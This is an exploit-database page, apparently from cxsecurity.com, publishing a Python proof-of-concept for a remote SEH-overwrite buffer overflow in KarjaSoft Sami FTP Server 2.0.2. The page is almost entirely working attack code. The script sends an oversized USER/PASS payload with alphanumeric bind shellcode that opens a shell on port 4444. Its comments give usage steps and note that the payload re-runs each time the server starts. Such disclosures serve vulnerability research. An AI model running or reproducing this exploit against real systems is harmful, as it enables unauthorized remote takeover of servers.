KarjaSoft Sami FTP Server 2.0.2 Buffer Overflow

2016.11.02
Credit: n30m1nd
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-119

#/usr/bin/python #-*- Coding: utf-8 -*- ### Sami FTP Server 2.0.2- SEH Overwrite, Buffer Overflow by n30m1nd ### # Date: 2016-01-11 # Exploit Author: n30m1nd # Vendor Homepage: http://www.karjasoft.com/ # Software Link: http://www.karjasoft.com/files/samiftp/samiftpd_install.exe # Version: 2.0.2 # Tested on: Win7 64bit and Win10 64 bit # Credits # ======= # Thanks to PHRACK for maintaining all the articles up for so much time... # These are priceless and still current for exploit development!! # Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better # How to # ====== # * Open Sami FTP Server and open its graphical interface # * Run this python script and write the IP to attack # * Connect to the same IP on port 4444 # # BONUS # ===== # Since the program will write the data into its (SamiFTP.binlog) logs it will try to load these logs on each # start and so, it will crash and run our shellcode everytime it starts. # Why? # ==== # The graphical interface tries to show the user name which produces an overflow overwriting SEH # Exploit code # ============ import socket import struct def doHavoc(ipaddr): # Bad chars: 00 0d 0a ff alignment = "\x90"*3 jmpfront = "345A7504".decode('hex') #CPU Disasm #Hex dump Command # 34 5A XOR AL,5A # 75 04 JNE SHORT +04 # pop pop ret in tmp01.dll popret = 0x10022ADE # fstenv trick to get eip: phrack number 62 # and store it into EAX for the metasploit shell (BufferRegister) getEIPinEAX = "D9EED934E48B44E40C040b".decode('hex') #CPU Disasm #Hex dump Command # D9EE FLDZ # D934E4 FSTENV SS:[ESP] # 8B44E4 0C MOV EAX,DWORD PTR SS:[ESP+0C] # 04 0B ADD AL,0B # Bind shellcode on port 4444 - alpha mixed BufferRegister=EAX shellcode = ( getEIPinEAX + "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylm8mRS0UP7p" "e0K9jEDqYPU4Nk60VPlKCbdLnkbrWdLKqb4hfoNWczEvdqyoNLElpaalC2dl10kq" "xO6mEQ9WxbjRf22wNkf220lKsz5lNkblr1sHxcsxGqZqcaLK0YQ05QiCNkCyB8Hc" "VZ1Ynk5dlKEQyF01IoNLYQHOvm31yW6X9pRUXvwsSMIhgKqmDdT5KTf8NkaHWTEQ" "yCavNkDLBklKbx7lgqN3nkC4nkuQXPk9w47Tq4skaKsQV9pZPQkOYpcosobzNkWb" "8kNmSmbH5cP2C0Wpu8Qgd3UbCof4e80LD7ev379oyElxlP31GpWpFIo4V4bpCXa9" "op2KePyohURJFhPY0P8bimw0pPG0rpu8xjDOYOipYoiEj7QxWrC0wa3lmYZFbJDP" "qFqGCXYRIKDw3WkOZuv7CXNWkYehKOkOiEaGPhD4HlwKm1KOhUQGJ7BHRUpnrmqq" "Iokee83S2McT30oyXcQGV767FQIfcZfrv9PVYrImQvKwG4DdelvaGqLM0D5tDPO6" "GpRd0T602vaFF6w666rnqFsf2sPV0h2YzleoovYoXUK9kPrnSfPFYo00Ph7xk7wm" "sPYoKeMkxplulb2vsXoVmEOMomKO9EgL4FCLFjk0YkM0qec5Mkg7FsD2ROqzGpv3" "ioJuAA" ) # Final payload, SEH overwrite ocurrs at 600 bytes payload = alignment + "."*(600-len(alignment)-len(jmpfront)) + jmpfront + struct.pack("<L", popret) + shellcode try: s = socket.create_connection((ipaddr, 21)) s.send("USER "+ payload +"\r\n" ) print s.recv(4096) s.send("PASS "+ payload +"\r\n" ) print s.recv(4096) print s.recv(4096) except e: print str(e) exit("[+] Couldn't connect") if __name__ == "__main__": ipaddr = raw_input("[+] IP: ") doHavoc(ipaddr) while raw_input("[?] Got shell?(y/n) ").lower() == "n": doHavoc(ipaddr) print "[+] Enjoy..."


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top